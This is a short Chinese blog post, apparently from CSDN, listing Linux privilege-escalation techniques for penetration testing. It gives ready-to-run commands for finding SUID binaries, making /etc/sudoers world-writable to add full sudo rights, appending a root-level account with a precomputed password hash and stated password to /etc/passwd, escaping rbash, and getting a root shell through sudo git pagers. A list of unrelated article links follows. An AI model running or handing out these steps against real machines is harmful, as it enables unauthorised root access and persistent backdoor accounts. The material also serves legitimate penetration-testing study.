Linux内网提权

一、SUID提权

前提条件:

(1)SUID仅对二进制有效
(2)执行者对于该程序需要有x的可执行权限
(3)本权限仅在程序的执行过程中有效

1、设置SUID权限: root权限

chmod u+s filename 设置SUID位

chmod u-s filename 去掉SUID设置

2、 收集具有SUID权限的文件:

find / -perm -u=s -type f 2>/dev/null

SUID提权 - hello_bao - 博客园 (cnblogs.com)

二、sudoers提权

前提条件:/etc/sudoers 如果为当前权限可更改,则可进行写入普通用户sudo权限

bash 复制代码
chmod 777 /etc/sudoers
bash 复制代码
# User privilege specification

root    ALL=(ALL:ALL) ALL

#在这添加new_user的sudo 权限

new_user     ALL=(ALL:ALL) ALL

# Allow members of group sudo to execute any command

%sudo   ALL=(ALL:ALL) ALL

修改完将sudoers权限修改回去

bash 复制代码
chmod 440 /etc/sudoers

普通用户可进行sudo 执行root权限命令

bash 复制代码
sudo systemctl start ssh

三、重要软件或文件配置不当提权

nps提权

当nfs配置了读写权限且允许客户端以root访问时,就会存在该漏洞

passwd提权

如果当前用户有修改/etc/passwd的权限则可以添加一个root权限用户:

echo "test:advwtv/9yU5yQ:0:0:,,,:/root:/bin/bash" >>/etc/passwd

账号:test 密码:password@123

四、 rbash 逃逸

前提条件:当前用户shell为普通用户且有可以利用的命令

确定在rbash权限下:echo $PATH

确定可以使用的命令:compgen -c

【渗透测试】--- rbash逃逸方法简述-CSDN博客

五、git提权

前提条件:当前用户可以使用sudo中git权限

查看sudo -l 如果 有 (root) NOPASSWD: /usr/bin/git 则可以提权

以下两种二选一:

bash 复制代码
sudo git help config #在末行命令模式输入

!/bin/bash 或 !'sh' #完成提权



sudo git -p help

!/bin/bash #输入!/bin/bash,即可打开一个用户为root的shell
相关推荐
三8441 小时前
磁盘管理/fdisk
linux·运维·服务器
2601_954706491 小时前
云虚拟化移动端架构深度解析:API 自动化集群管控实战与商用选型方案
运维·架构·自动化
Elastic 中国社区官方博客2 小时前
从多模态 LLM 中引导构建音频嵌入
大数据·人工智能·elasticsearch·搜索引擎·ai·全文检索·音视频
库玛西2 小时前
深入剖析 Linux 线程机制与分页式存储管理
linux·服务器·c++·笔记
Helen_cai2 小时前
OpenHarmony 路由封装 RouterUtil 页面跳转统一管理(API Version23+)
运维·服务器·nginx·华为·harmonyos
春卷同学2 小时前
HarmonyOS掌上记账APP开发实践第18篇:编译时优化与 ArkTS 语法限制 — 提升应用性能的编码规范
linux·运维·ubuntu
江南风月2 小时前
WGCLOUD支持创建子账号吗
运维·zabbix·运维开发·prometheus
Dovis(誓平步青云)2 小时前
《 AI直连数据库落地实践:基于MCP协议打通开发工具与数据库全链路运维分析》
大数据·linux·运维·数据库·人工智能·架构
Elasticsearch2 小时前
Elastic 被评为 2026 年 Gartner® 可观测性平台魔力象限™领导者
elasticsearch
Elasticsearch3 小时前
Elastic 以满分成绩领先最新 AV-Comparatives 恶意软件防护测试
elasticsearch